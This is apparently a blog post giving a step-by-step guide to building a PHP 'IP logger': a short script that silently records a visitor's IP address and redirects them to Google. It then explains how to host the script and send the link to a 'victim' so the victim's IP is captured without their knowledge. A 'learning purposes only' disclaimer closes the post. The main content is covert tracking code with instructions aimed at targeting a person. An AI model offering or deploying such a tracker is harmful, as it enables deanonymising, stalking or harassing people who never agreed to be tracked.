Get IP Address of Your Fiends

Many of us curious how to find IP address of OUR friends or any remote computer, here is the easiest way to do this :-


see how to do this.. 

Follow the steps to make this stuff works:
Step 1: Copy the below script in the notepad and save as iplogger.php(you can change name whatever you like and make sure that your file extension should be .php not .php.txt).


$file = 'IPs.txt';
$handle = fopen($file,'a');
if(!isset($_GET['p'])) { header('Location: http://google.com'); }
fwrite($handle, $_GET['p'].': '.$_SERVER['REMOTE_ADDR'].'\r\n');
fclose($handle)
?>


Step 2: Make a blank notepad file and save as ips.txt (you can change name according to your script).

Now you have two files i.e. iplogger.php and ips.txt . You have to upload this two files on the web hosting sites.



Step 3: You need to signup on a free webhosting service or any webhosting service that supports php like:

www.t35.com
www.110mb.com
www.freehostia.com
www.ripway.com etc…..

After getting your signup done, you have your own subdomain like for instance you registered with ripway.com, then your domain is like “http://h1.ripway.com/yourname/”

Step 4: Now Login to your ripway account and go to “My Files” in the Ripway.

Step 5: Upload this two files(iplogger.php & ips.txt) in your ripway account.

So when you’re done with the uploading part, the link to your ip logger is “http://h1.ripway.com/yourname/iplogger.php”.

 Step 6: Now this is your link that you have to send to your victim. When victim click on this link he will be redirected to the www.google.com (you can change the this address in the script) and his pc's current ip address save in ips.txt(make sure that chmod of ips.txt is 777).Open ips.txt to view his ip address..



Notice: THIS POST IS INTENDED FOR LEARNING PURPOSES ONLY!, WE WOULD NOT TAKE ANY RESPONSIBILITY FOR ANY KIND OF ILLEGAL ACTIVITY FROM YOUR SIDE.

Related Posts

Tips and Tricks 7092445807410508804

Post a Comment Default Comments

Do not forget to drop your valuable comment here.
Note:- Please Do not put any external link, all the links are nofollow, as such comments goes to spam and are not displayed on this blog. Let’s enjoy a personal and evocative conversation.

emo-but-icon

item